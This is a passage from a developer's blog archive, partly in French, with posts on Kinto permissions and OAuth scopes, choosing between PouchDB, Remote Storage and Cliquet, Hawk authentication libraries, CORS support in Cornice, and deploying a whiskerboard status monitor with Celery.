        "write": ["fxa:49d02d55ad10973b7b9d0dc9eba7fdf0"]
    }
}

Il est possible d’ajouter des permissions à l’aide de PATCH :

PATCH /v1/buckets/servicedenuages_blog/collections/articles HTTP/1.1
Authorization: Bearer 0b9c2625dc21ef05f6ad4ddf47c5f203837aa32ca42fced54c2625dc21efac32
Accept: application/json

{
    "permissions": {
        "read": ["+system.Everyone"]
    }
}

HTTP/1.1 201 Created
Content-Type: application/json; charset=utf-8

{
    "id": "servicedenuages_blog",
    "permissions": {
        "write": ["fxa:49d02d55ad10973b7b9d0dc9eba7fdf0"],
        "read": ["system.Everyone"]
    }
}

Pour le PATCH nous utilisons la syntaxe préfixée par un + ou par un - pour ajouter ou enlever des principals sur un ACL.

Il est également possible de faire un PUT pour réinitialiser les ACLs, sachant que le PUT va ajouter l’utilisateur courant à la liste automatiquement mais qu’il pourra se retirer avec un PATCH. Ajouter l’utilisateur courant permet d’éviter les situations où plus personne n’a accès aux données.

Note

La permission create est valable pour POST mais aussi pour PUT lorsque l’enregistrement n’existe pas.

Le cas spécifique des données utilisateurs

Une des fonctionnalités actuelles de Kinto est de pouvoir gérer des collections d’enregistrements par utilisateur.

Sous *nix il est possible, pour une application, de sauvegarder la configuration de l’utilisateur courant dans son dossier personnel sans se soucier de l’emplacement sur le disque en utilisant ~/.

Dans notre cas si une application souhaite sauvegarder les contacts d’un utilisateur, elle peut utiliser le raccourci ~ pour faire référence au bucket personnel de l’utilisateur : /buckets/~/collections/contacts

Cette URL retournera le code HTTP 307 vers le bucket de l’utilisateur courant :

POST /v1/buckets/~/collections/contacts/records HTTP/1.1

{
   "name": "Rémy",
   "emails": ["remy@example.com"],
   "phones": ["+330820800800"]
}

HTTP/1.1 307 Temporary Redirect
Location: /v1/buckets/fxa:49d02d55ad10973b7b9d0dc9eba7fdf0/collections/contacts/records

Ainsi il est tout à fait possible à Alice de partager ses contacts avec Bob. Il lui suffit pour cela de donner la permission read à Bob sur sa collection et de donner l’URL complète /v1/buckets/fxa:49d02d55ad10973b7b9d0dc9eba7fdf0/collections/contacts/records à Bob.

La délégation des permissions

Dans le cas de Kinto, nous avons défini un format pour restreindre les permissions via les scopes OAuth2: storage:<bucket_id>:<collection_id>:<permissions_list>.

Ainsi, si on reprend l’exemple précédent de la liste de tâches, il est possible pour Bob de créer un token OAuth spécifique avec les scopes suivants : profile storage:todolist:tasks:write storage:~:contacts:read+records:create

Donc, bien que Bob a la permission write sur ses contacts, l’application utilisant ce token pourra uniquement lire les contacts existants et en ajouter de nouveaux.

Une partie de la complexité est donc de réussir à présenter ces scopes de manière lisible à l’utilisateur, afin qu’il choisisse quelles permissions donner aux applications qui agissent en son nom.

Voilà où nous en sommes de notre réflexion !

Si vous avez des choses à ajouter, des points de désaccord ou autres réflexions, n’hésitez pas à nous interrompre pendant qu’il est encore temps !

Eco-système et stockage générique

2015-04-30T00:00:00+02:00

tl;dr Nous devons construire un service de suivi de paiements, et nous hésitons à continuer à nous entêter avec notre propre solution de stockage/synchronisation.

Comme nous l’écrivions dans l’article précédent, nous souhaitons construire une solution de stockage générique. On refait Daybed chez Mozilla !

Notre objectif est simple: permettre aux développeurs d’application, internes à Mozilla ou du monde entier, de faire persister et synchroniser facilement des données associées à un utilisateur.

Les aspects de l’architecture qui nous semblent incontournables:

La solution doit reposer sur un protocole, et non sur une implémentation ;
L’auto-hébergement de l’ensemble doit être simplissime ;
L’authentification doit être pluggable, voire décentralisée (OAuth2, FxA, Persona) ;
Les enregistrements doivent pouvoir être validés par le serveur ;
Les données doivent pouvoir être stockées dans n’importe quel backend ;
Un système de permissions doit permettre de protéger des collections, ou de partager des enregistrements de manière fine ;
La résolution de conflits doit pouvoir avoir lieu sur le serveur ;
Le client doit être pensé «*offline-first*» ;
Le client doit pouvoir réconcilier les données simplement ;
Le client doit pouvoir être utilisé aussi bien dans le navigateur que côté serveur ;
Tous les composants se doivent d´être simples et substituables facilement.

La première question qui nous a été posée fût «*Pourquoi vous n’utilisez pas PouchDB ou Remote Storage ?*»

Remote Storage

Remote Storage est un standard ouvert pour du stockage par utilisateur. La specification se base sur des standards déjà existants et éprouvés: Webfinger, OAuth 2, CORS et REST.

L’API est simple, des projets prestigieux l’utilisent. Il y a plusieurs implémentations du serveur, et il existe un squelette Node pour construire un serveur sur mesure.

Le client remoteStorage.js permet d’intégrer la solution dans les applications Web. Il se charge du «store local», du cache, de la synchronization, et fournit un widget qui permet aux utilisateurs des applications de choisir le serveur qui recevra les données (via Webfinger).

ludbud, la version épurée de remoteStorage.js, se limite à l’abstraction du stockage distant. Cela permettrait à terme, d’avoir une seule bibliothèque pour stocker dans un serveur remoteStorage, ownCloud ou chez les méchants comme Google Drive ou Dropbox.

Au premier abord, la spécification correspond à ce que nous voulons accomplir:

La philosophie du protocole est saine;
L’éco-système est bien fichu;
La vision politique colle: redonner le contrôle des données aux utilisateurs (voir unhosted);
Les choix techniques compatibles avec ce qu’on a commencé (CORS, REST, OAuth 2);

En revanche, vis à vis de la manipulation des données, il y a plusieurs différences avec ce que nous souhaitons faire:

L’API suit globalement une métaphore «fichiers» (dossier/documents), plutôt que «données» (collection/enregistrements) ;
Il n’y a pas de validation des enregistrements selon un schéma (même si certaines implémentations du protocole le font) ;
Il n’y a pas la possibilité de trier/filtrer les enregistrements selon des attributs ;
Les permissions se limitent à privé/public (et l’auteur envisage plutôt un modèle à la Git)[1] ;

En résumé, il semblerait que ce que nous souhaitons faire avec le stockage d’enregistrements validés est complémentaire avec Remote Storage.

Si des besoins de persistence orientés «fichiers» se présentent, a priori nous aurions tort de réinventer les solutions apportées par cette spécification. Il y a donc de grandes chances que nous l´intégrions à terme, et que Remote Storage devienne une facette de notre solution.

PouchDB

PouchDB est une bibliothèque JavaScript qui permet de manipuler des enregistrements en local et de les synchroniser vers une base distante.

javascript
var db = new PouchDB('dbname');

db.put({
 _id: 'dave@gmail.com',
 name: 'David',
 age: 68
});

db.replicate.to('http://example.com/mydb');

Le projet a le vent en poupe, bénéficie de nombreux contributeurs, l’éco-système est très riche et l’adoption par des projets comme Hoodie ne fait que confirmer la pertinence de l’outil pour les développeurs frontend.

PouchDB gère un « store » local, dont la persistence est abstraite et repose sur l’API LevelDown pour persister les données dans n’importe quel backend.

Même si PouchDB adresse principalement les besoins des applications «*offline-first*», il peut être utilisé aussi bien dans le navigateur que côté serveur, via Node.

Synchronisation

La synchronisation (ou réplication) des données locales s’effectue sur un CouchDB distant.

Le projet PouchDB Server implémente l’API de CouchDB en NodeJS. Comme PouchDB est utilisé, on obtient un service qui se comporte comme un CouchDB mais qui stocke ses données n’importe où, dans un Redis ou un PostgreSQL par exemple.

La synchronisation est complète. Autrement dit, tous les enregistrements qui sont sur le serveur se retrouvent synchronisés dans le client. Il est possible de filtrer les collections synchronisées, mais cela n’a pas pour objectif de sécuriser l’accès aux données.

L’approche recommandée pour cloisonner les données par utilisateur consiste à créer une base de données par utilisateur.

Ce n’est pas forcément un problème, CouchDB supporte des centaines de milliers de bases sans sourciller. Mais selon les cas d’utilisation, le cloisement n’est pas toujours facile à déterminer (par rôle, par application, par collection, …).

Le cas d’utilisation « Payments »

Dans les prochaines semaines, nous devrons mettre sur pied un prototype pour tracer l’historique des paiements et abonnements d’un utilisateur.

Le besoin est simple:

l’application « Payment » enregistre les paiements et abonnements d’un utilisateur pour une application donnée;
l’application « Donnée » interroge le service pour vérifier qu’un utilisateur a payé ou est abonné;
l’utilisateur interroge le service pour obtenir la liste de tous ses abonnements.

Seule l’application « Payment » a le droit de créer/modifier/supprimer des enregistrements, les deux autres ne peuvent que consulter en lecture seule.

Une application donnée ne peut pas accéder aux paiements des autres applications, et un utilisateur ne peut pas accéder aux paiements des autres utilisateurs.

Avec RemoteStorage

Clairement, l’idée de RemoteStorage est de dissocier l’application executée, et les données créées par l’utilisateur avec celle-ci.

Dans notre cas, c’est l’application « Payment » qui manipule des données concernant un utilisateur. Mais celles-ci ne lui appartiennent pas directement: certes un utilisateur doit pouvoir les supprimer, surtout pas en créer ou les modifier!

La notion de permissions limitée à privé/publique ne suffit pas dans ce cas précis.

Avec PouchDB

Il va falloir créer une base de données par utilisateur, afin d’isoler les enregistrements de façon sécurisée. Seule l’application « Payment » aura tous les droits sur les databases.

Mais cela ne suffit pas.

Il ne faut pas qu’une application puisse voir les paiements des autres applications, donc il va aussi falloir recloisonner, et créer une base de données par application.

Quand un utilisateur voudra accéder à l’ensemble de ses paiements, il faudra agréger les databases de toutes les applications. Quand l’équipe marketing voudra faire des statistiques sur l’ensemble des applications, il faudra agrégér des centaines de milliers de databases.

Ce qui est fort dommage, puisqu’il est probable que les paiements ou abonnements d’un utilisateur pour une application se comptent sur les doigts d’une main. Des centaines de milliers de bases contenant moins de 5 enregistrements ?

De plus, dans le cas de l’application « Payment », le serveur est implémenté en Python. Utiliser un wrapper JavaScript comme le fait python-pouchdb cela ne nous fait pas trop rêver.

Un nouvel éco-système ?

Évidemment, quand on voit la richesse des projets PouchDB et Remote Storage et la dynamique de ces communautés, il est légitime d’hésiter avant de développer une solution alternative.

Quand nous avons créé le serveur Reading List, nous l’avons construit avec Cliquet, ce fût l’occasion de mettre au point un protocole très simple, fortement inspiré de Firefox Sync, pour faire de la synchronisation d’enregistrements.

Et si les clients Reading List ont pu être implémentés en quelques semaines, que ce soit en JavaScript, Java (Android) et ASM (Add-on Firefox), c’est que le principe «*offline first*» du service est trivial.

Les compromis

Évidemment, nous n’avons pas la prétention de concurrencer CouchDB. Nous faisons plusieurs concessions:

De base, les collections d’enregistrements sont cloisonnées par utilisateur;
Pas d’historique des révisions;
Pas de diff sur les enregistrements entre révisions;
De base, pas de résolution de conflit automatique;
Pas de synchronisation par flux (streams);

Jusqu’à preuve du contraire, ces compromis excluent la possibilité d’implémenter un adapter PouchDB pour la synchronisation avec le protocole HTTP de Cliquet.

Dommage puisque capitaliser sur l’expérience client de PouchDB au niveau synchro client semble être une très bonne idée.

En revanche, nous avons plusieurs fonctionnalités intéressantes:

Pas de map-reduce;
Synchronisation partielle et/ou ordonnée et/ou paginée ;
Le client choisit, via des headers, d’écraser la donnée ou de respecter la version du serveur ;
Un seul serveur à déployer pour N applications ;
Auto-hébergement simplissime ;
Le client peut choisir de ne pas utiliser de « store local » du tout ;
Dans le client JS, la gestion du « store local » sera externalisée (on pense à LocalForage ou Dexie.js) ;

Et, on répond au reste des specifications mentionnées au début de l’article !

Les arguments philosophiques

Il est illusoire de penser qu’on peut tout faire avec un seul outil.

Nous avons d’autres cas d’utilisations dans les cartons qui semblent correspondre au scope de PouchDB (pas de notion de permissions ou de partage, environnement JavaScript, …). Nous saurons en tirer profit quand cela s’avèrera pertinent !

L’éco-système que nous voulons construire tentera de couvrir les cas d’utilisation qui sont mal adressés par PouchDB. Il se voudra:

Basé sur notre protocole très simple ;
Minimaliste et multi-usages (comme la fameuse 2CV) ;
Naïf (pas de rocket science) ;
Sans magie (explicite et facile à réimplémenter from scratch) ;

La philosophie et les fonctionnalités du toolkit python Cliquet seront bien entendu à l’honneur :)

Quant à Remote Storage, dès que le besoin se présentera, nous serons très fier de rejoindre l’initiative, mais pour l’instant cela nous paraît risqué de démarrer en tordant la solution.

Les arguments pratiques

Avant d’accepter de déployer une solution à base de CouchDB, les ops de Mozilla vont nous demander de leur prouver par A+B que ce n’est pas faisable avec les stacks qui sont déjà rodées en interne (i.e. MySQL, Redis, PostgreSQL).

De plus, on doit s’engager sur une pérennité d’au moins 5 ans pour les données. Avec Cliquet, en utilisant le backend PostgreSQL, les données sont persistées à plat dans un schéma PostgreSQL tout bête. Ce qui ne sera pas le cas d’un adapteur LevelDown qui va manipuler des notions de révisions éclatées dans un schéma clé-valeur.

Si nous basons le service sur Cliquet, comme c’est le cas avec Kinto, tout le travail d’automatisation de la mise en production (monitoring, builds RPM, Puppet…) que nous avons fait pour Reading List est complètement réutilisable.

De même, si on repart avec une stack complètement différente, nous allons devoir recommencer tout le travail de rodage, de profiling et d’optimisation effectué au premier trimestre.

Les prochaines étapes

Et il est encore temps de changer de stratégie :) Nous aimerions avoir un maximum de retours ! C’est toujours une décision difficile à prendre… </appel à troll>

Tordre un éco-système existant vs. constuire sur mesure ;
Maîtriser l’ensemble vs. s’intégrer ;
Contribuer vs. refaire ;
Guider vs. suivre.

Nous avons vraiment l’intention de rejoindre l’initiative no-backend, et ce premier pas n’exclue pas que nous convergions à terme ! Peut-être que nous allons finir par rendre notre service compatible avec Remote Storage, et peut-être que PouchDB deviendra plus agnostique quand au protocole de synchronisation…

Utiliser ce nouvel écosystème pour le projet « Payments » va nous permettre de mettre au point un système de permissions (probablement basé sur les scopes OAuth) qui correspond au besoin exprimé. Et nous avons bien l’intention de puiser dans notre expérience avec Daybed sur le sujet.

Nous extrairons aussi le code des clients implémentés pour Reading List afin de faire un client JavaScript minimaliste.

En partant dans notre coin, nous prenons plusieurs risques:

réinventer une roue dont nous n’avons pas connaissance ;
échouer à faire de l’éco-système Cliquet un projet communautaire ;
échouer à positionner Cliquet dans la niche des cas non couverts par PouchDB :)

Comme le dit Giovanni Ornaghi:

Rolling out your set of webservices, push notifications, or background services might give you more control, but at the same time it will force you to engineer, write, test, and maintain a whole new ecosystem.

C’est justement l’éco-système dont est responsable l’équipe Mozilla Cloud Services!

Il existe le projet Sharesome qui permet de partager publiquement des ressources de son remote Storage.

Service de nuages !

2015-04-01T00:00:00+02:00

Cet article est repris depuis le blog « Service de Nuages » de mon équipe à Mozilla

Pas mal de changements depuis le début de l’année pour l’équipe «cloud-services» francophone!

Tout d’abord, nouvelle importante, l’équipe s’étoffe avec des profils assez complémentaires: n1k0 et Mathieu sont venus prêter main forte à Tarek, Rémy et Alexis.

Le début de l’année a vu le lancement de Firefox Hello ce qui nous a permis de passer à l’échelle le serveur, écrit en Node.js®, pour l’occasion.

Un serveur de listes de lecture

En parallèle, un projet de synchronisation de liste de lecture (Reading List) a vu le jour. L’idée étant de pouvoir marquer des pages “à lire pour plus tard” et de continuer la lecture sur n’importe quel périphérique synchronisé (Firefox pour Android ou Firefox Desktop). Un équivalent libre à Pocket en quelque sorte, qu’il est possible d’héberger soit-même.

Pour le construire, nous aurions pu réutiliser Firefox Sync, après tout c’est un service de synchronisation de données très robuste, construit avec Cornice. Mais seulement, Sync n’a pas été pensé pour garantir la pérennité des données, et la marche était trop haute pour changer ça en profondeur.

Nous aurions pu aussi nous contenter de faire une énième application qui expose une API et persiste des données dans une base de données.

Mais cette nouvelle petite équipe n’est pas là par hasard :)

La «Daybed Team»

On partage une vision: un service générique de stockage de données ! Peut-être que ça vous rappelle un certain projet nommé Daybed ? Pour les applications clientes, JavaScript, mobiles ou autres, l’utilisation de ce service doit être un jeu d’enfant ! L’application gère ses données localement (aka offline-first), et synchronise à la demande.

Ici, le cœur du serveur Reading List est justement une API “CRUD” (Create, Retrieve, Update, Delete), qui gère de la synchronisation et de l’authentification. Nous avons donc pris le parti de faire une API “simple”, avec le moins de spécificités possible, qui poserait les bases d’un service générique. Notamment parce qu’il y a d’autres projets dans la même trempe qui vont suivre.

Pas mal d’expérience ayant été accumulée au sein de l’équipe, avec d’une part la création de Firefox Sync, et d’autre part avec Daybed, notre side-project, nous tentons de ne pas reproduire les mêmes erreurs, tout en gardant les concepts qui ont fait leurs preuves.

Par exemple, nous avons conservé le mécanisme de collections d’enregistrements et de timestamp de Sync. Comme ces problématiques sont récurrentes, voire incontournables, nous avons décidé de reprendre le protocole de synchronisation, de l’étendre légèrement et surtout de le dissocier du projet de listes de lecture.

Le mécanisme qui force à aller de l’avant

Comme première pierre à l’édifice, nous avons donné naissance au projet Cliquet, dont l’idée principale est de fournir une implémentation de ce protocole en python, tout en factorisant l’ensemble de nos bonnes pratiques (pour la prod notamment).

L’avantage d’avoir un protocole plutôt qu’un monolithe, c’est que si vous préférez Asyncio, io.js ou Go, on vous encouragera à publier votre implémentation alternative !

Avec Cliquet, le code du serveur liste de lecture consiste principalement à définir un schéma pour les enregistrements, puis à forcer des valeurs de champs sur certains appels. Cela réduit ce projet à quelques dizaines de lignes de code.

Quant au futur service de stockage générique, le projet en est encore à ses balbutiements mais c’est bel et bien en route ! Il permet déjà d’être branché comme backend de stockage dans une application Cliquet, et ça implémenté en 20 lignes de code!

Ah, et cette fois, nous ne construirons les fonctionnalités qu’à partir des besoins concrets qui surviennent. Ça paraît tout bête, mais sur Daybed on l’a pas vu venir :)

Dans les prochains articles, nous avons prévu de décrire les bonnes pratiques rassemblées dans le protocole (ou Cliquet), certains points techniques précis et de vous présenter notre vision via des exemples et tutoriaux.

À bientôt, donc !

What’s Hawk and how to use it?

2014-07-31T00:00:00+02:00

At Mozilla, we recently had to implement the Hawk authentication scheme for a number of projects, and we came up creating two libraries to ease integration into pyramid and node.js apps.

But maybe you don’t know Hawk.

Hawk is a relatively new technology, crafted by one of the original OAuth specification authors, that intends to replace the 2-legged OAuth authentication scheme using a simpler approach.

It is an authentication scheme for HTTP, built around HMAC digests of requests and responses.

Every authenticated client request has an Authorization header containing a MAC (Message Authentication Code) and some additional metadata, then each server response to authenticated requests contains a Server-Authorization header that authenticates the response, so the client is sure it comes from the right server.

Exchange of the hawk id and hawk key

To sign the requests, a client needs to retrieve a token id and a token key from the server.

Hawk itself does not define how these credentials should be exchanged between the server and the client. The excellent team behind Firefox Accounts put together a scheme to do that, which acts like the following:

Note

All this derivation crazyness might seem a bit complicated, but don’t worry, we put together some libraries that takes care of that for you automatically. If you are not interested into these details, you can directly jump to the next section to see how to use the libraries.

When your server application needs to send you the credentials, it will return it inside a specific Hawk-Session-Token header. This token can be derived to split this string in two values (hawk id and hawk key) that you will use to sign your next requests.

In order to get the hawk credentials, you’ll need to:

First, do an HKDF derivation on the given session token. You’ll need to use the following parameters:

key_material = HKDF(hawk_session, "", 'identity.mozilla.com/picl/v1/sessionToken', 32*2)

Note

The `identity.mozilla.com/picl/v1/sessionToken` is a reference to this way of deriving the credentials, not an actual URL.

Then, the key material you’ll get out of the HKDF need to be separated into two parts, the first 32 hex caracters are the hawk id, and the next 32 ones are the hawk key.

Credentials:

javascript
credentials = {
    'id': keyMaterial[0:32],
    'key': keyMaterial[32:64],
    'algorithm': 'sha256'
}

Httpie

To showcase APIs in the documentation, I like to use httpie, a curl-replacement with a nicer API, built around the python requests library.

Luckily, HTTPie allows you to plug different authentication schemes for it, so I wrote a wrapper around mohawk to add hawk support to the requests lib.

Doing hawk requests in your terminal is now as simple as:

$ pip install requests-hawk httpie
$ http GET localhost:5000/registration --auth-type=hawk --auth='id:key'

In addition, it will help you to craft requests using the requests library:

import requests
from requests_hawk import HawkAuth

hawk_auth = HawkAuth(
  credentials={'id': id, 'key': key, 'algorithm': 'sha256'})

requests.post("/url", auth=hawk_auth)

Alternatively, if you don’t have the token id and key, you can pass the hawk session token I talked about earlier and the lib will take care of the derivation for you:

hawk_auth = HawkAuth(
    hawk_session=resp.headers['hawk-session-token'],
    server_url=self.server_url
)
requests.post("/url", auth=hawk_auth)

Integrate with python pyramid apps

If you’re writing pyramid applications, you’ll be happy to learn that Ryan Kelly put together a library that makes Hawk work as an Authentication provider for them. I’m chocked how simple it is to use it.

Here is a demo of how we implemented it for Daybed:

from pyramid_hawkauth import HawkAuthenticationPolicy

policy = HawkAuthenticationPolicy(decode_hawk_id=get_hawk_id)
config.set_authentication_policy(authn_policy)

The get_hawk_id function is a function that takes a request and a tokenid and returns a tuple of (token_id, token_key).

How you want to store the tokens and retrieve them is up to you. The default implementation (e.g. if you don’t pass a decode_hawk_id function) decodes the key from the token itself, using a master secret on the server (so you don’t need to store anything).

Integrate with node.js Express apps

We had to implement Hawk authentication for two node.js projects and finally came up factorizing everything in a library for express, named express-hawkauth.

In order to plug it in your application, you’ll need to use it as a middleware:

javascript
var express = require("express");
var hawk = require("express-hawkauth");
app = express();

var hawkMiddleware = hawk.getMiddleware({
  hawkOptions: {},
  getSession: function(tokenId, cb) {
    // A function which pass to the cb the key and algorithm for the
    // given token id. First argument of the callback is a potential
    // error.
    cb(null, {key: "key", algorithm: "sha256"});
  },
  createSession: function(id, key, cb) {
    // A function which stores a session for the given id and key.
    // Argument returned is a potential error.
    cb(null);
  },
  setUser: function(req, res, tokenId, cb) {
    // A function that uses req and res, the hawkId when they're known so
    // that it can tweak it. For instance, you can store the tokenId as the
    // user.
    req.user = tokenId;
  }
});

app.get("/hawk-enabled-endpoint", hawkMiddleware);

If you pass the createSession parameter, all non-authenticated requests will create a new hawk session and return it with the response, in the Hawk-Session-Token header.

If you want to only check a valid hawk session exists (without creating a new one), just create a middleware which doesn’t have any createSession parameter defined.

Some reference implementations

As a reference, here is how we’re using the libraries I’m talking about, in case that helps you to integrate with your projects.

The Mozilla Loop server uses hawk as authentication once you’re logged in with a valid BrowserID assertion; request, to keep a session between client and server;
I recently added hawk support on the Daybed project (that’s a pyramid / cornice) app.
It’s also interesting to note that Kumar put together hawkrest, for the django rest framework

Implementing CORS in Cornice

2013-02-04T00:00:00+01:00

Note

I’m cross-posting [on the mozilla services weblog](https://blog.mozilla.org/services/). Since this is the first time we’re doing that, I though it could be useful to point you there. Check it out and expect more technical articles there in the future.

For security reasons, it’s not possible to do cross-domain requests. In other words, if you have a page served from the domain lolnet.org, it will not be possible for it to get data from notmyidea.org.

Well, it’s possible, using tricks and techniques like JSONP, but that doesn’t work all the time (see the section below). I remember myself doing some simple proxies on my domain server to be able to query other’s API.

Thankfully, there is a nicer way to do this, namely, “Cross Origin Resource-Sharing”, or CORS.

You want an icecream? Go ask your dad first.

If you want to use CORS, you need the API you’re querying to support it; on the server side.

The HTTP server need to answer to the OPTIONS verb, and with the appropriate response headers.

OPTIONS is sent as what the authors of the spec call a “preflight request”; just before doing a request to the API, the User-Agent (the browser most of the time) asks the permission to the resource, with an OPTIONS call.

The server answers, and tell what is available and what isn’t:

1a. The User-Agent, rather than doing the call directly, asks the server, the API, the permission to do the request. It does so with the following headers:
- Access-Control-Request-Headers, contains the headers the User-Agent want to access.
- Access-Control-Request-Method contains the method the User-Agent want to access.
1b. The API answers what is authorized:
- Access-Control-Allow-Origin the origin that’s accepted. Can be * or the domain name.
- Access-Control-Allow-Methods a list of allowed methods. This can be cached. Note than the request asks permission for one method and the server should return a list of accepted methods.
- Access-Allow-Headers a list of allowed headers, for all of the methods, since this can be cached as well.
1. The User-Agent can do the “normal” request.

So, if you want to access the /icecream resource, and do a PUT there, you’ll have the following flow:

> OPTIONS /icecream
> Access-Control-Request-Methods = PUT
> Origin: notmyidea.org
< Access-Control-Allow-Origin = notmyidea.org
< Access-Control-Allow-Methods = PUT,GET,DELETE
200 OK

You can see that we have an Origin Header in the request, as well as a Access-Control-Request-Methods. We’re here asking if we have the right, as notmyidea.org, to do a PUT request on /icecream.

And the server tells us that we can do that, as well as GET and DELETE.

I’ll not cover all the details of the CORS specification here, but bear in mind than with CORS, you can control what are the authorized methods, headers, origins, and if the client is allowed to send authentication information or not.

A word about security

CORS is not an answer for every cross-domain call you want to do, because you need to control the service you want to call. For instance, if you want to build a feed reader and access the feeds on different domains, you can be pretty much sure that the servers will not implement CORS, so you’ll need to write a proxy yourself, to provide this.

Secondly, if misunderstood, CORS can be insecure, and cause problems. Because the rules apply when a client wants to do a request to a server, you need to be extra careful about who you’re authorizing.

An incorrectly secured CORS server can be accessed by a malicious client very easily, bypassing network security. For instance, if you host a server on an intranet that is only available from behind a VPN but accepts every cross-origin call. A bad guy can inject javascript into the browser of a user who has access to your protected server and make calls to your service, which is probably not what you want.

How this is different from JSONP?

You may know the JSONP protocol. JSONP allows cross origin, but for a particular use case, and does have some drawbacks (for instance, it’s not possible to do DELETEs or PUTs with JSONP).

JSONP exploits the fact that it is possible to get information from another domain when you are asking for javascript code, using the \<script> element.

Exploiting the open policy for \<script> elements, some pages use them to retrieve JavaScript code that operates on dynamically generated JSON-formatted data from other origins. This usage pattern is known as JSONP. Requests for JSONP retrieve not JSON, but arbitrary JavaScript code. They are evaluated by the JavaScript interpreter, not parsed by a JSON parser.

Using CORS in Cornice

Okay, things are hopefully clearer about CORS, let’s see how we implemented it on the server-side.

Cornice is a toolkit that lets you define resources in python and takes care of the heavy lifting for you, so I wanted it to take care of the CORS support as well.

In Cornice, you define a service like this:

from cornice import Service

foobar = Service(name="foobar", path="/foobar")

# and then you do something with it
@foobar.get()
def get_foobar(request):
    # do something with the request.

To add CORS support to this resource, you can go this way, with the cors_origins parameter:

foobar = Service(name='foobar', path='/foobar', cors_origins=('*',))

Ta-da! You have enabled CORS for your service. Be aware that you’re authorizing anyone to query your server, that may not be what you want.

Of course, you can specify a list of origins you trust, and you don’t need to stick with *, which means “authorize everyone”.

Headers

You can define the headers you want to expose for the service:

foobar = Service(name='foobar', path='/foobar', cors_origins=('*',))

@foobar.get(cors_headers=('X-My-Header', 'Content-Type'))
def get_foobars_please(request):
    return "some foobar for you"

I’ve done some testing and it wasn’t working on Chrome because I wasn’t handling the headers the right way (The missing one was Content-Type, that Chrome was asking for). With my first version of the implementation, I needed the service implementers to explicitely list all the headers that should be exposed. While this improves security, it can be frustrating while developing.

So I introduced an expose_all_headers flag, which is set to True by default, if the service supports CORS.

Cookies / Credentials

By default, the requests you do to your API endpoint don’t include the credential information for security reasons. If you really want to do that, you need to enable it using the cors_credentials parameter. You can activate this one on a per-service basis or on a per-method basis.

Caching

When you do a preflight request, the information returned by the server can be cached by the User-Agent so that it’s not redone before each actual call.

The caching period is defined by the server, using the Access-Control-Max-Age header. You can configure this timing using the cors_max_age parameter.

Simplifying the API

We have cors_headers, cors_enabled, cors_origins, cors_credentials, cors_max_age, cors_expose_all_headers … a fair number of parameters. If you want to have a specific CORS-policy for your services, that can be a bit tedious to pass these to your services all the time.

I introduced another way to pass the CORS policy, so you can do something like that:

policy = dict(enabled=False,
              headers=('X-My-Header', 'Content-Type'),
              origins=('*.notmyidea.org'),
              credentials=True,
              max_age=42)

foobar = Service(name='foobar', path='/foobar', cors_policy=policy)

Comparison with other implementations

I was curious to have a look at other implementations of CORS, in django for instance, and I found a gist about it.

Basically, this adds a middleware that adds the “rights” headers to the answer, depending on the request.

While this approach works, it’s not implementing the specification completely. You need to add support for all the resources at once.

We can think about a nice way to implement this specifying a definition of what’s supposed to be exposed via CORS and what shouldn’t directly in your settings. In my opinion, CORS support should be handled at the service definition level, except for the list of authorized hosts. Otherwise, you don’t know exactly what’s going on when you look at the definition of the service.

Resources

There are a number of good resources that can be useful to you if you want to either understand how CORS works, or if you want to implement it yourself.

http://enable-cors.org/ is useful to get started when you don’t know anything about CORS.
There is a W3C wiki page containing information that may be useful about clients, common pitfalls etc: http://www.w3.org/wiki/CORS_Enabled
HTML5 rocks has a tutorial explaining how to implement CORS, with a nice section about the server-side.
Be sure to have a look at the clients support-matrix for this feature.
About security, check out this page
If you want to have a look at the implementation code, check on github

Of course, the W3C specification is the best resource to rely on. This specification isn’t hard to read, so you may want to go through it. Especially the “resource processing model” section

Status board

2012-12-29T00:00:00+01:00

À force de démarrer des services web pour un oui et pour un non, de proposer à des copains d’héberger leurs sites, de faire pareil pour quelques assos etc, je me suis retrouvé avec, comme dirait l’autre, une bonne platrée de sites et de services à gérer sur lolnet.org, mon serveur.

Jusqu’à très récemment, rien de tout ça n’était sauvegardé, et non plus monitoré. Après quelques recherches, je suis tombé sur stashboard, un “status board” qu’il est bien fait. Le seul problème, c’est écrit pour se lancer sur GAE, Google App Engine. Heureusement, c’est open-source, et ça a été forké pour donner naissance à whiskerboard (la planche moustachue, pour les non anglophones).

Vérifier le statut des services

Donc, c’est chouette, c’est facile à installer, tout ça, mais… mais ça ne fait en fait pas ce que je veux: ça ne fait que m’afficher le statut des services, mais ça ne vérifie pas que tout est bien “up”.

Bon, un peu embêtant pour moi, parce que c’est vraiment ça que je voulais. Pas grave, je sais un peu coder, autant que ça serve. J’ai ajouté quelques fonctionnalités au soft, qui sont disponibles sur mon fork, sur github:: https://github.com/almet/whiskerboard .

Entres autres, il est désormais possible de lancer celery en tache de fond et de vérifier périodiquement que les services sont toujours bien vivants, en utilisant une tache spécifique.

C’était un bonheur de développer ça (on a fait ça à deux, avec guillaume, avec un mumble + tmux en pair prog, en une petite soirée, ça dépote).

Les modifications sont assez simples, vous pouvez aller jeter un œil aux changements ici: https://github.com/almet/whiskerboard/compare/b539337416…master

En gros:

ajout d’une connection_string aux services (de la forme protocol://host:port)
ajout d’une commande check_status qui s’occupe d’itérer sur les services et de lancer des taches celery qui vont bien, en fonction du protocole
ajout des taches en question

Déploiement

Le plus long a été de le déployer en fin de compte, parce que je ne voulais pas déployer mon service de supervision sur mon serveur, forcément.

Après un essai (plutôt rapide en fait) sur heroku, je me suis rendu compte qu’il me fallait payer pas loin de 35$ par mois pour avoir un process celeryd qui tourne, donc j’ai un peu cherché ailleurs, pour finalement déployer la chose chez alwaysdata

Après quelques péripéties, j’ai réussi à faire tourner le tout, ça à été un peu la bataille au départ pour installer virtualenv (j’ai du faire des changements dans mon PATH pour que ça puisse marcher), voici mon `.bash_profile`:

export PYTHONPATH=~/modules/
export PATH=$HOME/modules/bin:$HOME/modules/:$PATH

Et après y’a plus qu’à installer avec `easy_install`:

easy_install --install-dir ~/modules -U pip
easy_install --install-dir ~/modules -U virtualenv

Et à créer le virtualenv:

virtualenv venv
venv/bin/pip install -r requirements.txt

Dernière étape, la création d’un fichier application.wsgi qui s’occupe de rendre l’application disponible, avec le bon venv:

SSL et Requests

Quelques tours de manivelle plus loin, j’ai un celeryd qui tourne et qui consomme les taches qui lui sont envoyées (pour des questions de simplicité, j’ai utilisé le backend django de celery, donc pas besoin d’AMQP, par exemple).

